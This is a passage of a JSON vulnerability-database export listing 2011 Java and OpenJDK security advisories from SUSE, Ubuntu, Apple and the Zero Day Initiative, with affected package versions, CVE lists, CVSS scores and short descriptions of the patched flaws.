"java-1_5_0-ibm-devel-1.5.0_sr13.0-0.5.1.i586.rpm", "arch": "i586", "operator": "lt"}], "description": "IBM Java 5 was updated to SR13, fixing various bugs and\n security issues.\n\n Security issues addressed are tracked by:\n\n CVE-2011-3545, CVE-2011-3547, CVE-2011-3548 CVE-2011-3549,\n CVE-2011-3552, CVE-2011-3554 CVE-2011-3557\n", "edition": 1, "reporter": "Suse", "published": "2011-12-02T10:08:33", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "title": "Security update for IBM Java (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3557", "CVE-2011-3549", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3554", "CVE-2011-3545", "CVE-2011-3552"], "modified": "2011-12-02T10:08:33", "id": "SUSE-SU-2011:1298-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-12/msg00003.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:37", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3558", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3521", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3560", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3552", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3551", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3544", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3547", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3377", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3556", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3553", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3389", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3548", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3557", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-3554"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "6b22-1.10.4-0ubuntu1~11.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-6-jre-jamvm", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "6b20-1.9.10-0ubuntu1~10.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-zero", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "6b20-1.9.10-0ubuntu1~10.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-6-jre-cacao", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "1.1.1-0ubuntu1~11.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-netx", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "6b22-1.10.4-0ubuntu1~11.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "6b23~pre11-0ubuntu1.11.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-6-jre-jamvm", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "6b20-1.9.10-0ubuntu1~10.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea6-plugin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "6b23~pre11-0ubuntu1.11.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-zero", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "6b20-1.9.10-0ubuntu1~10.10.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-zero", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "6b23~pre11-0ubuntu1.11.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-headless", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "6b22-1.10.4-0ubuntu1~11.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-zero", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "6b20-1.9.10-0ubuntu1~10.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-lib", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "6b20-1.9.10-0ubuntu1~10.10.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "1.1.3-1ubuntu1.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-plugin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "6b22-1.10.4-0ubuntu1~11.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-lib", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "6b20-1.9.10-0ubuntu1~10.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-headless", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "6b20-1.9.10-0ubuntu1~10.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "6b20-1.9.10-0ubuntu1~10.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-demo", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "6b20-1.9.10-0ubuntu1~10.10.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-headless", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "6b20-1.9.10-0ubuntu1~10.10.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jdk", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "1.1.1-0ubuntu1~11.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-plugin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "6b23~pre11-0ubuntu1.11.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-lib", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "6b20-1.9.10-0ubuntu1~10.10.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-6-jre-cacao", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "6b22-1.10.4-0ubuntu1~11.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-headless", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "6b20-1.9.10-0ubuntu1~10.10.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-demo", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "6b22-1.10.4-0ubuntu1~11.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-6-jre-cacao", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "6b23~pre11-0ubuntu1.11.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "6b20-1.9.10-0ubuntu1~10.10.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-lib", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "6b23~pre11-0ubuntu1.11.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-6-jre-cacao", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "1.1.3-1ubuntu1.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-netx", "operator": "lt"}], "description": "Deepak Bhole discovered a flaw in the Same Origin Policy (SOP) implementation in the IcedTea web browser plugin. This could allow a remote attacker to open connections to certain hosts that should not be permitted. (CVE-2011-3377)\n\nJuliano Rizzo and Thai Duong discovered that the block-wise AES encryption algorithm block-wise as used in TLS/SSL was vulnerable to a chosen-plaintext attack. This could allow a remote attacker to view confidential data. (CVE-2011-3389)\n\nIt was discovered that a type confusion flaw existed in the in the Internet Inter-Orb Protocol (IIOP) deserialization code. A remote attacker could use this to cause an untrusted application or applet to execute arbitrary code by deserializing malicious input. (CVE-2011-3521)\n\nIt was discovered that the Java scripting engine did not perform SecurityManager checks. This could allow a remote attacker to cause an untrusted application or applet to execute arbitrary code with the full privileges of the JVM. (CVE-2011-3544)\n\nIt was discovered that the InputStream class used a global buffer to store input bytes skipped. An attacker could possibly use this to gain access to sensitive information. (CVE-2011-3547)\n\nIt was discovered that a vulnerability existed in the AWTKeyStroke class. A remote attacker could cause an untrusted application or applet to execute arbitrary code. (CVE-2011-3548)\n\nIt was discovered that an integer overflow vulnerability existed in the TransformHelper class in the Java2D implementation. A remote attacker could use this cause a denial of service via an application or applet crash or possibly execute arbitrary code. (CVE-2011-3551)\n\nIt was discovered that the default number of available UDP sockets for applications running under SecurityManager restrictions was set too high. A remote attacker could use this with a malicious application or applet exhaust the number of available UDP sockets to cause a denial of service for other applets or applications running within the same JVM. (CVE-2011-3552)\n\nIt was discovered that Java API for XML Web Services (JAX-WS) could incorrectly expose a stack trace. A remote attacker could potentially use this to gain access to sensitive information. (CVE-2011-3553)\n\nIt was discovered that the unpacker for pack200 JAR files did not sufficiently check for errors. An attacker could cause a denial of service or possibly execute arbitrary code through a specially crafted pack200 JAR file. (CVE-2011-3554)\n\nIt was discovered that the RMI registration implementation did not properly restrict privileges of remotely executed code. A remote attacker could use this to execute code with elevated privileges. (CVE-2011-3556, CVE-2011-3557)\n\nIt was discovered that the HotSpot VM could be made to crash, allowing an attacker to cause a denial of service or possibly leak sensitive information. (CVE-2011-3558)\n\nIt was discovered that the HttpsURLConnection class did not properly perform SecurityManager checks in certain situations. This could allow a remote attacker to bypass restrictions on HTTPS connections. (CVE-2011-3560)", "edition": 3, "reporter": "Ubuntu", "published": "2011-11-16T00:00:00", "title": "IcedTea-Web, OpenJDK 6 vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3377", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2011-11-16T00:00:00", "id": "USN-1263-1", "href": "https://usn.ubuntu.com/1263-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:18", "references": ["https://usn.ubuntu.com/usn/usn-1263-1", "https://launchpad.net/bugs/891761"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "6b20-1.9.10-0ubuntu1~10.10.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-6-jre-cacao", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "6b22-1.10.4-0ubuntu1~11.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-zero", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "6b20-1.9.10-0ubuntu1~10.04.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-zero", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "6b22-1.10.4-0ubuntu1~11.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-6-jre-jamvm", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "6b23~pre11-0ubuntu1.11.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-headless", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "6b22-1.10.4-0ubuntu1~11.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-6-jre-cacao", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "6b23~pre11-0ubuntu1.11.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-6-jre-jamvm", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "6b23~pre11-0ubuntu1.11.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-zero", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "6b20-1.9.10-0ubuntu1~10.04.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-headless", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "6b20-1.9.10-0ubuntu1~10.10.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "6b22-1.10.4-0ubuntu1~11.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "6b22-1.10.4-0ubuntu1~11.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-lib", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "6b20-1.9.10-0ubuntu1~10.04.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "6b20-1.9.10-0ubuntu1~10.10.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-lib", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "6b20-1.9.10-0ubuntu1~10.04.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-6-jre-cacao", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "6b20-1.9.10-0ubuntu1~10.10.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-zero", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "6b23~pre11-0ubuntu1.11.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "6b20-1.9.10-0ubuntu1~10.10.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-headless", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "6b23~pre11-0ubuntu1.11.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-lib", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "6b22-1.10.4-0ubuntu1~11.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-headless", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "6b20-1.9.10-0ubuntu1~10.04.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "openjdk-6-jre-lib", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "6b23~pre11-0ubuntu1.11.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "icedtea-6-jre-cacao", "operator": "lt"}], "description": "USN-1263-1 fixed vulnerabilities in OpenJDK 6. The upstream patch for the chosen plaintext attack on the block-wise AES encryption algorithm (CVE-2011-3389) introduced a regression that caused TLS/SSL connections to fail when using certain algorithms. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nDeepak Bhole discovered a flaw in the Same Origin Policy (SOP) implementation in the IcedTea web browser plugin. This could allow a remote attacker to open connections to certain hosts that should not be permitted. (CVE-2011-3377)\n\nJuliano Rizzo and Thai Duong discovered that the block-wise AES encryption algorithm block-wise as used in TLS/SSL was vulnerable to a chosen-plaintext attack. This could allow a remote attacker to view confidential data. (CVE-2011-3389)\n\nIt was discovered that a type confusion flaw existed in the in the Internet Inter-Orb Protocol (IIOP) deserialization code. A remote attacker could use this to cause an untrusted application or applet to execute arbitrary code by deserializing malicious input. (CVE-2011-3521)\n\nIt was discovered that the Java scripting engine did not perform SecurityManager checks. This could allow a remote attacker to cause an untrusted application or applet to execute arbitrary code with the full privileges of the JVM. (CVE-2011-3544)\n\nIt was discovered that the InputStream class used a global buffer to store input bytes skipped. An attacker could possibly use this to gain access to sensitive information. (CVE-2011-3547)\n\nIt was discovered that a vulnerability existed in the AWTKeyStroke class. A remote attacker could cause an untrusted application or applet to execute arbitrary code. (CVE-2011-3548)\n\nIt was discovered that an integer overflow vulnerability existed in the TransformHelper class in the Java2D implementation. A remote attacker could use this cause a denial of service via an application or applet crash or possibly execute arbitrary code. (CVE-2011-3551)\n\nIt was discovered that the default number of available UDP sockets for applications running under SecurityManager restrictions was set too high. A remote attacker could use this with a malicious application or applet exhaust the number of available UDP sockets to cause a denial of service for other applets or applications running within the same JVM. (CVE-2011-3552)\n\nIt was discovered that Java API for XML Web Services (JAX-WS) could incorrectly expose a stack trace. A remote attacker could potentially use this to gain access to sensitive information. (CVE-2011-3553)\n\nIt was discovered that the unpacker for pack200 JAR files did not sufficiently check for errors. An attacker could cause a denial of service or possibly execute arbitrary code through a specially crafted pack200 JAR file. (CVE-2011-3554)\n\nIt was discovered that the RMI registration implementation did not properly restrict privileges of remotely executed code. A remote attacker could use this to execute code with elevated privileges. (CVE-2011-3556, CVE-2011-3557)\n\nIt was discovered that the HotSpot VM could be made to crash, allowing an attacker to cause a denial of service or possibly leak sensitive information. (CVE-2011-3558)\n\nIt was discovered that the HttpsURLConnection class did not properly perform SecurityManager checks in certain situations. This could allow a remote attacker to bypass restrictions on HTTPS connections. (CVE-2011-3560)", "edition": 3, "reporter": "Ubuntu", "published": "2012-01-24T00:00:00", "title": "OpenJDK 6 regression", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3377", "CVE-2011-3560", "CVE-2011-3552"], "modified": "2012-01-24T00:00:00", "id": "USN-1263-2", "href": "https://usn.ubuntu.com/1263-2/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:44", "references": ["https://vulners.com/securityvulns/securityvulns:doc:27223", "https://vulners.com/securityvulns/securityvulns:doc:27283", "https://vulners.com/securityvulns/securityvulns:doc:27184", "https://vulners.com/securityvulns/securityvulns:doc:27221", "https://vulners.com/securityvulns/securityvulns:doc:27222"], "description": "Quarterly CPU fixes 20 different vulnerabilities.", "edition": 1, "reporter": "ORACLE", "published": "2011-11-11T00:00:00", "title": "Oracle Java multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:44", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "JavaFX", "version": "2.0", "operator": "eq"}, {"name": "JDK", "version": "6", "operator": "eq"}, {"name": "JRE", "version": "1.4", "operator": "eq"}, {"name": "JRE", "version": "6", "operator": "eq"}, {"name": "JRockit", "version": "28.1", "operator": "eq"}, {"name": "JDK", "version": "5", "operator": "eq"}, {"name": "JRE", "version": "7", "operator": "eq"}, {"name": "JDK", "version": "7", "operator": "eq"}, {"name": "JRE", "version": "5", "operator": "eq"}], "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3549", "CVE-2011-3561", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3516", "CVE-2011-3558", "CVE-2011-3555", "CVE-2011-3546", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3545", "CVE-2011-3552", "CVE-2011-3550"], "modified": "2011-11-11T00:00:00", "id": "SECURITYVULNS:VULN:11988", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11988", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:42", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2011-11-08-1 Java for Mac OS X 10.7 Update 1 and Java for Mac\r\nOS X 10.6 Update 6\r\n\r\nJava for Mac OS X 10.7 Update 1 and Java for Mac OS X 10.6 Update 6\r\nare now available and address the following:\r\n\r\nJava\r\nAvailable for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,\r\nMac OS X v10.7.2, Mac OS X Server v10.7.2\r\nImpact: Multiple vulnerabilities in Java 1.6.0_26\r\nDescription: Multiple vulnerabilities exist in Java 1.6.0_26, the\r\nmost serious of which may allow an untrusted Java applet to execute\r\narbitrary code outside the Java sandbox. Visiting a web page\r\ncontaining a maliciously crafted untrusted Java applet may lead to\r\narbitrary code execution with the privileges of the current user.\r\nThese issues are addressed by updating to Java version 1.6.0_29.\r\nFurther information is available via the Java website at\r\nhttp://java.sun.com/javase/6/webnotes/ReleaseNotes.html\r\nCVE-ID\r\nCVE-2011-3389\r\nCVE-2011-3521\r\nCVE-2011-3544\r\nCVE-2011-3545\r\nCVE-2011-3546\r\nCVE-2011-3547\r\nCVE-2011-3548\r\nCVE-2011-3549\r\nCVE-2011-3551\r\nCVE-2011-3552\r\nCVE-2011-3553\r\nCVE-2011-3554\r\nCVE-2011-3556\r\nCVE-2011-3557\r\nCVE-2011-3558\r\nCVE-2011-3560\r\nCVE-2011-3561\r\n\r\nJava for Mac OS X 10.7 Update 1 and Java for Mac OS X 10.6 Update 6\r\nmay be obtained from the Software Update pane in System Preferences,\r\nor Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nFor Mac OS X v10.6 systems\r\nThe download file is named: JavaForMacOSX10.6.dmg\r\nIts SHA-1 digest is: be0ac75b8bac967f1d39a94ebf9482a61fb7d70b\r\n\r\nFor Mac OS X v10.7 systems\r\nThe download file is named: JavaForMacOSX10.7.dmg\r\nIts SHA-1 digest is: 7768e6aeb5adaa638c74d4c04150517ed99fed20\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.16 (Darwin)\r\n\r\niQEcBAEBAgAGBQJOuZNKAAoJEGnF2JsdZQeece8H/1I98YQ1LF4iDD442zB+WjZP\r\n2Vxd3euXYwySD6qDCYNLJ0hUKu90c/4nr5d5rRH3xYdBzAHuZG39m069lpN1UZIW\r\nt5ube+j9zjiejnXlPbAgq+vIAg22nu0EdxhOOZZeQOoEYqyoKhXNCt3fR+tzo3o4\r\nmN/LWMO1NwrM0sGDPuUGs2TWdPZbC4QJJz4Z4S+FsTlujYh9MRd3dyxLBIg7BKCL\r\nwgnFdpFW8bPmVdiTj91pC0Gb3XtolQxexXGHsdI15KeFMbQ06nKV/AyvxMF8O5jS\r\nD089GEHE52NAQCZ0YJ6TJsisrGqTZZ77js55cPU259FogxEKKBuwfdFbn4qVeD8=\r\n=4KBF\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2011-11-11T00:00:00", "title": "APPLE-SA-2011-11-08-1 Java for Mac OS X 10.7 Update 1 and Java for Mac OS X 10.6 Update 6", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:42", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3549", "CVE-2011-3561", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3558", "CVE-2011-3546", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3545", "CVE-2011-3552"], "modified": "2011-11-11T00:00:00", "id": "SECURITYVULNS:DOC:27283", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27283", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:42", "references": [], "description": "ZDI-11-306 : Oracle Java IIOP Deserialization Type Confusion Remote Code\r\nExecution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-306\r\nOctober 26, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-3521\r\n\r\n-- CVSS:\r\n9, AV:N/AC:L/Au:N/C:P/I:P/A:C\r\n\r\n-- Affected Vendors:\r\n\r\nOracle\r\n\r\n\r\n\r\n-- Affected Products:\r\n\r\nOracle Java Runtime\r\n\r\n\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Oracle Java. User interaction is required to\r\nexploit this vulnerability in that the target must visit a malicious\r\npage or open a malicious file.\r\n\r\nThe specific flaw exists within the way Java handles IIOP\r\ndeserialization. Due to insufficient type checking it is possible to\r\ntrick java into allowing access to otherwise protected and private\r\nfields in built-in objects. This could be used, for example, to disable\r\nto security manager normally in place for applets. This leads to remote\r\ncode execution under the context of the current user.\r\n\r\n-- Vendor Response:\r\n\r\nOracle has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html\r\n\r\n\r\n\r\n-- Disclosure Timeline:\r\n2011-05-12 - Vulnerability reported to vendor\r\n2011-10-26 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n\r\n* Sami Koivu\r\n\r\n\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents\r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2011-10-31T00:00:00", "title": "ZDI-11-306 : Oracle Java IIOP Deserialization Type Confusion Remote Code Execution Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:42", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2011-3521"], "modified": "2011-10-31T00:00:00", "id": "SECURITYVULNS:DOC:27222", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27222", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:42", "references": [], "description": "ZDI-11-305 : Oracle Java Applet Rhino Script Engine Remote Code\r\nExecution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-305\r\nOctober 26, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-3544\r\n\r\n-- CVSS:\r\n9, AV:N/AC:L/Au:N/C:P/I:P/A:C\r\n\r\n-- Affected Vendors:\r\n\r\nOracle\r\n\r\n\r\n\r\n-- Affected Products:\r\n\r\nOracle Java Runtime\r\n\r\n\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Oracle 